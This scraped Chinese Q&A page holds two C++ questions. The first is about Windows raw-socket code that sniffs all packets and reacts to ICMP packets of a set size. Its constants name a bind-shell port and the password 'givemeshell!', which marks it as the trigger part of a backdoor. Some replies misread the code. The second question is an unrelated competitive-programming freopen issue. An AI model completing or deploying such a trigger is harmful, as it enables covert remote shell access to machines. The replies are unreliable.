C++关于网络编程的问题

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了C++关于网络编程的问题相关的知识,希望对你有一定的参考价值。

程序源代码如下 可以正常的编译运行

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
//#include <mstcpip.h>
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
#define ICMP_ECHO 8// ICMP回显请求报文的类型值为8
#define ICMP_ECHOREPLY 0// ICMP回显应答报文的类型值为0
#define SNIFFER_ICMP_SIZE 101// 监听ICMP包的大小
#define BIND_PORT 8080// 默认bind shell 端口
#define MAX_PACKET 10000// 最大ICMP包的大小
#define DEF_PASSWORD "givemeshell!" // 默认密码
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,(s))
int main()

WSADATA wsaData;
DWORD dwBytesReturned = 0;
DWORD dwBufferLen[10];
DWORD dwBufferInLen = 1;
int packsize = SNIFFER_ICMP_SIZE;
SOCKET socksniffer;
struct sockaddr_in dest,from;
struct hostent * hp;
int sread;
int fromlen = sizeof(from);
unsigned char LocalName[256];
char *recvbuf;
int retval;
// socket 初始化
if ((retval = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)

printf("WSAStartup failed: %d\n",retval);
exit(-1);

// 创建一个原始socket, 接受所有接收的包(sniffer)
if ((socksniffer = WSASocket(AF_INET, SOCK_RAW, IPPROTO_IP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)

printf("WSASocket() failed: %d\n", WSAGetLastError());
return -1;

// 取得本地地址
gethostname((char*)LocalName, sizeof(LocalName)-1);
if((hp = gethostbyname((char*)LocalName)) == NULL)

return -1;


memset(&dest,0,sizeof(dest));
memcpy(&dest.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length);
printf("&dest:%d\n",&dest.sin_addr.s_addr);// TCP嗅探选项
dest.sin_family = AF_INET;
dest.sin_port = htons(8000);// 指定任意端口
// socket bind
bind(socksniffer, (PSOCKADDR)&dest, sizeof(dest));
// 设置socket为接受所有包
WSAIoctl(socksniffer, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL );
// 分配socket接收缓冲区大小为MAX_PACKET
recvbuf = (char *)xmalloc(MAX_PACKET);
// 循环监听包的大小
while(1)

// 读数据
sread = recvfrom(socksniffer, recvbuf, MAX_PACKET, 0, (struct sockaddr*)&from, &fromlen);
// 如果读数据出错
if (sread == SOCKET_ERROR || sread < 0)

if (WSAGetLastError() == WSAETIMEDOUT)

continue;

printf("recvfrom failed: %d\n",WSAGetLastError());
return -1;

else
//if ( sread >= 28)
// 如果读到数据的大小 == 监听包的大小 + 28
if ( sread == packsize + 28)


printf("read the next part");



return 1;


问题是这里不是太理解
if ( sread == packsize + 28) printf("read the next part");
我在联网的状态下运行程序后有时自动打出read the next part 有时后却没有任何反应 求高手解释下原因
我这里不是对发送的判断啊 是对接收的判断 如果接收大小为128的包的话 就是打印read the next part 看不懂你那段代码的意义

参考技术A 恩,这样可以保证对方能收到。像下面代码实现,它有对每次发送进行成功与否判断
int sendto(SOCKET s,char* buf,int len)

int ret;
int num_sent = 0;
char* p = buf;
while (1)

ret = send(s,p+num_sent,len,0);
if (ret == -1)
return -1;
else if (ret > 0)

num_sent += ret;
len -= ret;
if (len == 0)

return num_sent;



参考技术B 我感觉if ( sread == packsize + 28) printf("read the next part");
,这个条件是不是太苛刻了?如果单个包限制在128.TCP连接有时会分几次收完一个包,看你的逻辑也就是如果没有一次全收到刚好128bit的包的话就无法打印这一句了....或许你应该另外定义一个变量来做分批收一个包的增量计算,当收到128时就打印收下一个包追问

例如我用 PING xxx.xxx.xxx.xxx -l 100 就会向目标地址发送大小为101字节的包 加上包头27就等于128 这个程序应该就会执行打印命令 为什么不成功 希望高手耐心指教

c++编程时关于freopen的小问题

【问题描述】
平面上有N条直线,用方程Aix + Biy +Ci =0表示。这些直线没有三线共点的。现在要你计算出用这些直线可以构造出多少三角形?
【输入格式】
第1行:一个整数N(1 ≤ N≤ 300000)。
下面N行:每行3个整数:Ai, Bi 和Ci,表示对应直线方程的系数。不超过10^9.

【输出格式】
一行,一个整数。

input 1
6
0 1 0
-5 3 0
-5 -2 25
0 1 -3
0 1 -2
-4 -5 29
input 2
5
-5 3 0
-5 -3 -30
0 1 0
3 7 35
1 -2 -1
output 1
10
output 2
10

/////////////////////////////#include<cstdio>
#include<algorithm>
using namespace std;
struct edge

int a,b,c;
xian[300010];
bool cmp(edge x,edge y)

return 1LL*x.a*y.b>1LL*y.a*x.b;

long long ans=0;
int main()

// freopen("trokuti.in","r",stdin);
// freopen("trokuti.out","w",stdout);
int n;
scanf("%d",&n);
ans=1LL*(n)*(n-1)*(n-2)/6;
for(int i=1;i<=n;i++)

scanf("%d%d%d",&xian[i].a,&xian[i].b,&xian[i].c);


sort(xian+1,xian+n+1,cmp);
int l=1,r=1,len=1;
while(1)

if(1LL*xian[l].a*xian[r+1].b==1LL*xian[l].b*xian[r+1].a&&r<n)

len++;
r++;

if(r==n||1LL*xian[l].a*xian[r+1].b!=1LL*xian[l].b*xian[r+1].a)

if(len>=2)

ans-=1LL*len*(len-1)*(n-len)/2;

if(len>=3)

ans-=1LL*(len-1)*(len-2)*len/6;

len=0;
l=r+1;
r++;
if(l>n||r>n)

break;



printf("%lld",ans);

/////////////////////////////
代码如上,总之,去掉freopen两个样例是能过的,也能输出结果,问题加了这个freopen之后,程序会莫名的死机卡掉。以前都是加freopen编译运行后直接显示按任意键返回,这次直接显示等待输入,而且卡死无法输入,问题好像出现在while循环那里,注释掉while,freopen可以正常使用,但是没有freopen的时候程序明明是可以得出结果的。。这是为什么,从没遇到这种情况,求神犇不吝赐教!!!

参考技术A 我用的c++,试了试freopen,非常变扭,如果你要用文件输入输出,那就用fstream或者cstdio自带的FILE *追问

我学算法竞赛一直用这个啊。。。标程也用freopen。。今天突然出这个错我我也很绝望。。按理说不应该有这种事情..

追答

FILE和fstream都不允许使用吗?这两个文件输入还是很好用的,我的编译器不支持freopen,scanf,它说不安全,所以我也不知道怎么帮你

以上是关于C++关于网络编程的问题的主要内容,如果未能解决你的问题,请参考以下文章

c++编程时关于freopen的小问题

Visual Studio 2008 中是不是有关于 C++ 编程的教程? [关闭]

C++编程题 关于 继承和多态 的

求助啊!!!救命!!!关于c++和PROLOG混合编程

关于C++菱形继承问题的解决

推荐一本《神经网络》方面的书 Delphi C++